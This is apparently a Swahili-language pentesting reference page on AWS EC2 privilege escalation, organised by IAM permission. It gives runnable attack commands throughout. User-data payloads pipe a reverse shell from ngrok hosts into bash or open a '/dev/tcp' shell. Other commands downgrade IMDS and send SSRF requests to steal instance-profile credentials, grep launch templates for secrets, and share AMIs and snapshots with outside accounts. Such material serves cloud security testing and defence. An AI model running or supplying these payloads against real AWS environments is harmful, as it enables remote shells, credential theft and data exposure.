AWS - EC2 Privesc

Reading time: 13 minutes

EC2

Kwa taarifa kuhusu EC2 angalia:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

iam:PassRole, ec2:RunInstances

Mshambuliaji anaweza kuunda instance akiwa ameambatisha IAM role kisha kufikia instance hiyo ili kuiba dhamana za IAM role kutoka kwenye metadata endpoint.

• Ufikiaji kupitia SSH

Endesha instance mpya ukitumia created ssh key (--key-name) kisha ufungue ssh ndani yake (ikiwa unataka kuunda mpya unaweza kuhitaji ruhusa ec2:CreateKeyPair).

aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=<instance-profile-name> --key-name <ssh-key> \
--security-group-ids <sg-id>

• Ufikiaji kupitia rev shell katika user data

Unaweza kuanzisha instance mpya ukitumia user data (--user-data) ambayo itakutumia rev shell. Hauhitaji kubainisha security group kwa njia hii.

echo '#!/bin/bash
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh

aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=<instance-profile-name> \
--count 1 \
--user-data "file:///tmp/rev.sh"

Kuwa makini na GuradDuty ikiwa unatumia credentials za IAM role nje ya instance:

AWS - GuardDuty Enum

Potential Impact: Privesc ya moja kwa moja kwa EC2 role yoyote iliyounganishwa kwenye instance profiles zilizopo.

Privesc kwa ECS

Kwa seti hii ya ruhusa unaweza pia kuunda EC2 instance na kuisajili ndani ya ECS cluster. Kwa njia hii, ECS services zitaendeshwa ndani ya EC2 instance unayoweza kufikia na kisha unaweza kuvamia services hizo (docker containers) na kuiba ECS roles zao zilizounganishwa.

aws ec2 run-instances \
--image-id ami-07fde2ae86109a2af \
--instance-type t2.micro \
--iam-instance-profile <ECS_role> \
--count 1 --key-name pwned \
--user-data "file:///tmp/asd.sh"

# Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs)
# The EC2 instance profile needs basic ECS access
# The content of the user data is:
#!/bin/bash
echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;

Ili kujifunza jinsi ya kulazimisha huduma za ECS ziendeshwe katika instance hii mpya ya EC2 angalia:

AWS - ECS Privesc

Ikiwa huwezi kuunda instance mpya lakini una ruhusa ecs:RegisterContainerInstance unaweza kuwa na uwezo wa kusajili instance ndani ya cluster na kutekeleza shambulio lililotajwa.

Potential Impact: Direct privesc kwa ECS roles zilizoambatanishwa na tasks.

iam:PassRole, iam:AddRoleToInstanceProfile

Kama katika senario iliyopita, mshambuliaji mwenye ruhusa hizi angeweza kubadilisha IAM role ya instance iliyovamiwa ili aweze kuiba credentials mpya.
Kwa kuwa instance profile inaweza kuwa na role 1 tu, ikiwa instance profile tayari ina role (hali ya kawaida), utahitaji pia iam:RemoveRoleFromInstanceProfile.

# Removing role from instance profile
aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-name <name>

# Add role to instance profile
aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name <name>

Ikiwa instance profile ina role na mshambuliaji hawawezi kuiondoa, kuna njia mbadala. Anaweza kutafuta instance profile isiyo na role au kuunda mpya (iam:CreateInstanceProfile), kuongeza role kwa instance profile hiyo (kama ilivyotajwa hapo awali), na kuhusisha instance profile compromised to a compromised instance:

• Ikiwa instance haina instance yoyote profile (ec2:AssociateIamInstanceProfile)

aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>

Athari Inayowezekana: Direct privesc to a different EC2 role (unahitaji kuwa umevamia AWS EC2 instance na ruhusa za ziada au status maalum ya instance profile).

iam:PassRole(( ec2:AssociateIamInstanceProfile& ec2:DisassociateIamInstanceProfile) || ec2:ReplaceIamInstanceProfileAssociation)

Kwa ruhusa hizi inawezekana kubadilisha instance profile inayohusishwa na instance, hivyo ikiwa mshambulizi tayari alikuwa na ufikiaji wa instance atakuwa na uwezo wa kuiba credentials za role nyingine za instance profile kwa kubadilisha ile inayohusishwa nayo.

• Ikiwa ina an instance profile, unaweza kuondoa the instance profile (ec2:DisassociateIamInstanceProfile) na kuunganisha it

aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
aws ec2 disassociate-iam-instance-profile --association-id <value>
aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>

• au badili instance profile ya instance iliyovamiwa (ec2:ReplaceIamInstanceProfileAssociation).

aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=<value> --association-id <value>

Madhara Yanayoweza Kutokea: privesc ya moja kwa moja kwa EC2 role tofauti (unahitaji kuwa umevamia AWS EC2 instance na ruhusa za ziada au hali maalum ya instance profile).

ec2:RequestSpotInstances,iam:PassRole

Mshambuliaji akiwa na ruhusa ec2:RequestSpotInstancesandiam:PassRole anaweza kuomba Spot Instance iliyo na EC2 Role attached na rev shell katika user data.\
Mara instance inapotekelezwa, anaweza kuiba IAM role.

REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)

aws ec2 request-spot-instances \
--instance-count 1 \
--launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"

ec2:ModifyInstanceAttribute

Mshambuliaji mwenye ec2:ModifyInstanceAttribute anaweza kurekebisha sifa za instance. Miongoni mwa hayo, anaweza change the user data, ambayo ina maana anaweza kufanya instance run arbitrary data. Ambayo inaweza kutumika kupata rev shell to the EC2 instance.

Kumbuka kwamba sifa zinaweza tu kubadilishwa wakati instance imezimwa, hivyo inahitaji ruhusa ec2:StopInstances na ec2:StartInstances.

TEXT='Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

#!/bin/bash
bash -i >& /dev/tcp/2.tcp.ngrok.io/14510 0>&1
--//'
TEXT_PATH="/tmp/text.b64.txt"

printf $TEXT | base64 > "$TEXT_PATH"

aws ec2 stop-instances --instance-ids $INSTANCE_ID

aws ec2 modify-instance-attribute \
--instance-id="$INSTANCE_ID" \
--attribute userData \
--value file://$TEXT_PATH

aws ec2 start-instances --instance-ids $INSTANCE_ID

Athari Inayoweza Kutokea: privesc ya moja kwa moja kwa EC2 IAM Role yoyote imeambatishwa kwenye instance iliyoundwa.

ec2:CreateLaunchTemplateVersion,ec2:CreateLaunchTemplate,ec2:ModifyLaunchTemplate

Mshambulizi mwenye ruhusa ec2:CreateLaunchTemplateVersion,ec2:CreateLaunchTemplateand ec2:ModifyLaunchTemplate anaweza kuunda mpya Launch Template version yenye rev shell katika user data na EC2 IAM Role yoyote juu yake, kubadilisha toleo chaguo-msingi, na kikundi chochote cha Autoscaler kinachotumia hiyo Launch Template ambacho kimewekwa kutumia hivi karibuni au toleo chaguo-msingi kitarudia kuendesha instances kwa kutumia template hiyo na kutekeleza rev shell.

REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)

aws ec2 create-launch-template-version \
--launch-template-name bad_template \
--launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}"

aws ec2 modify-launch-template \
--launch-template-name bad_template \
--default-version 2

Athari Inayoweza Kutokea: Moja kwa moja privesc hadi EC2 role tofauti.

(autoscaling:CreateLaunchConfiguration | ec2:CreateLaunchTemplate), iam:PassRole, (autoscaling:CreateAutoScalingGroup | autoscaling:UpdateAutoScalingGroup)

Mshambuliaji aliye na ruhusa autoscaling:CreateLaunchConfiguration,autoscaling:CreateAutoScalingGroup,iam:PassRole anaweza kuunda Launch Configuration yenye IAM Role na rev shell ndani ya user data, kisha kuunda autoscaling group kutoka kwa config hiyo na kusubiri rev shell ili kuiba IAM Role.

aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \
--launch-configuration-name bad_config \
--image-id ami-0c1bc246476a5572b \
--instance-type t3.micro \
--iam-instance-profile EC2-CloudWatch-Agent-Role \
--user-data "$REV"

aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \
--auto-scaling-group-name bad_auto \
--min-size 1 --max-size 1 \
--launch-configuration-name bad_config \
--desired-capacity 1 \
--vpc-zone-identifier "subnet-e282f9b8"

Athari Inayoweza Kutokea: Privesc ya moja kwa moja hadi role tofauti ya EC2.

!autoscaling

Seti ya ruhusa ec2:CreateLaunchTemplate na autoscaling:CreateAutoScalingGroup hazitoshi kuinua ruhusa hadi IAM role kwa sababu ili kuambatisha role iliyobainishwa katika Launch Configuration au katika Launch Template unahitaji ruhusa iam:PassRole na ec2:RunInstances (ambazo ni privesc inayojulikana).

ec2-instance-connect:SendSSHPublicKey

Mshambuliaji mwenye ruhusa ec2-instance-connect:SendSSHPublicKey anaweza kuongeza ufunguo wa SSH kwa mtumiaji na kuitumia kuingia (ikiwa ana ufikiaji wa SSH kwa instance) au kuinua ruhusa.

aws ec2-instance-connect send-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--instance-os-user "ec2-user" \
--ssh-public-key "file://$PUBK_PATH"

Athari Inayowezekana: Direct privesc to the EC2 IAM roles attached to running instances.

ec2-instance-connect:SendSerialConsoleSSHPublicKey

Mshambuliaji mwenye ruhusa ec2-instance-connect:SendSerialConsoleSSHPublicKey anaweza kuongeza ssh key kwenye serial connection. Ikiwa serial haijawezeshwa, mshambuliaji anahitaji ruhusa ec2:EnableSerialConsoleAccess ili kuiwezesha.

Ili kuunganishwa na serial port pia unahitaji kujua username na password ya mtumiaji ndani ya mashine.

aws ec2 enable-serial-console-access

aws ec2-instance-connect send-serial-console-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--serial-port 0 \
--region "eu-west-1" \
--ssh-public-key "file://$PUBK_PATH"

ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws

Njia hii sio muhimu sana kwa privesc kwa sababu unahitaji kujua username na password ili kui-exploit.

Potential Impact: (Haiwezi kuthibitishwa kwa urahisi) Privesc ya moja kwa moja kwa EC2 IAM roles zilizounganishwa na instances zinazoendesha.

describe-launch-templates,describe-launch-template-versions

Kwa kuwa launch templates zina versioning, attacker mwenye ruhusa za ec2:describe-launch-templates na ec2:describe-launch-template-versions anaweza kuzitumia kugundua taarifa nyeti, kama vile credentials zilizopo katika user data. Ili kufanya hivyo, script ifuatayo inapitia matoleo yote ya launch templates zinazopatikana:

for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId')
do
echo "[*] Analyzing $i"
aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata
do
echo "VersionNumber: $version"
echo "$userdata" | base64 -d
echo
done | grep -iE "aws_|password|token|api"
done

Katika amri zilizo hapo juu, ingawa tunabainisha mifumo fulani (aws_|password|token|api), unaweza kutumia regex tofauti kutafuta aina nyingine za taarifa nyeti.

Ikizingatiwa tunapopata aws_access_key_id na aws_secret_access_key, tunaweza kutumia maelezo haya ya utambulisho kujiuthibitisha kwenye AWS.

Athari Inayoweza Kutokea: Kuongezeka kwa madaraka moja kwa moja kwa mtumiaji(wa) wa IAM.

References

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

ec2:ModifyInstanceMetadataOptions (Kupunguza kiwango cha IMDS ili kuwezesha kuiba maelezo ya utambulisho kupitia SSRF)

Mshambuliaji mwenye uwezo wa kuita ec2:ModifyInstanceMetadataOptions kwenye instance ya EC2 ya mwathiri anaweza kudhoofisha ulinzi wa IMDS kwa kuwezesha IMDSv1 (HttpTokens=optional) na kuongeza HttpPutResponseHopLimit. Hii inafanya endpoint ya metadata ya instance ipatikane kupitia njia za kawaida za SSRF/proxy kutoka kwa programu zinazokimbia kwenye instance. Iwapo mshambuliaji ataweza kusababisha SSRF katika app kama hiyo, wanaweza kupata maelezo ya utambulisho ya instance profile na kutumia kuingia kwa rasilimali nyingine.

• Ruhusa zinazohitajika: ec2:ModifyInstanceMetadataOptions kwenye instance lengwa (na uwezo wa kufikia/kusababisha SSRF kwenye mwenyeji).
• Rasilimali lengwa: instance ya EC2 inayokimbia yenye instance profile imeambatishwa (IAM role).

Mfano wa amri:

# 1) Check current metadata settings
aws ec2 describe-instances --instance-id <INSTANCE_ID> \
--query 'Reservations[0].Instances[0].MetadataOptions'

# 2) Downgrade IMDS protections (enable IMDSv1 and raise hop limit)
aws ec2 modify-instance-metadata-options --instance-id <INSTANCE_ID> \
--http-endpoint enabled --http-tokens optional \
--http-put-response-hop-limit 3 --instance-metadata-tags enabled

# 3) Through the SSRF, enumerate role name
curl "http://<VICTIM_PUBLIC_IP>:<APP_PORT>/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# 4) Through the SSRF, steal the temporary credentials
curl "http://<VICTIM_PUBLIC_IP>:<APP_PORT>/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE_NAME>"

# 5) Use the stolen credentials
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<Token>
aws sts get-caller-identity

# 6) Restore protections (require IMDSv2, low hop limit)
aws ec2 modify-instance-metadata-options --instance-id <INSTANCE_ID> \
--http-tokens required --http-put-response-hop-limit 1

Potential Impact: Uiba wa instance profile credentials kupitia SSRF ikisababisha privilege escalation na lateral movement kwa kutumia ruhusa za EC2 role.

ec2:ModifyInstanceMetadataOptions

Mshambuliaji mwenye ruhusa ya ec2:ModifyInstanceMetadataOptions anaweza kudhoofisha ulinzi wa Instance Metadata Service (IMDS) — kwa mfano kwa kulazimisha IMDSv1 (kufanya HttpTokens zisihitajike) au kwa kuongeza HttpPutResponseHopLimit — hivyo kurahisisha kuondolewa kwa siri kwa temporary credentials. Vectori ya hatari inayofaa zaidi ni kuinua HttpPutResponseHopLimit: kwa kuongeza kikomo hicho cha hop (TTL), endpoint 169.254.169.254 inasimama kushindwa kuwa kikamilifu iliyowekwa ndani ya network namespace ya VM na inaweza kufikiwa na michakato/containers nyingine, hivyo kuwezesha uiba wa credentials.

aws ec2 modify-instance-metadata-options \
--instance-id <INSTANCE_ID> \
--http-tokens optional \
--http-endpoint enabled \
--http-put-response-hop-limit 2

ec2:ModifyImageAttribute, ec2:ModifySnapshotAttribute

Mshambulizi ambaye ana ruhusa za ec2:ModifyImageAttribute na ec2:ModifySnapshotAttribute anaweza kushiriki AMIs au snapshots na akaunti nyingine za AWS (au hata kufanya ziwe za umma), akifichua images au volumes ambazo zinaweza kuwa na data nyeti kama usanidi, credentials, certificates, au backups. Kwa kubadilisha AMI’s launch permissions au snapshot’s create-volume permissions, mshambulizi anawawezesha watu wa tatu kuzindua instances au mount disks kutoka kwa rasilimali hizo na kufikia yaliyomo.

Ili kushiriki AMI na akaunti nyingine:

aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>

Kushiriki EBS snapshot na akaunti nyingine:

aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>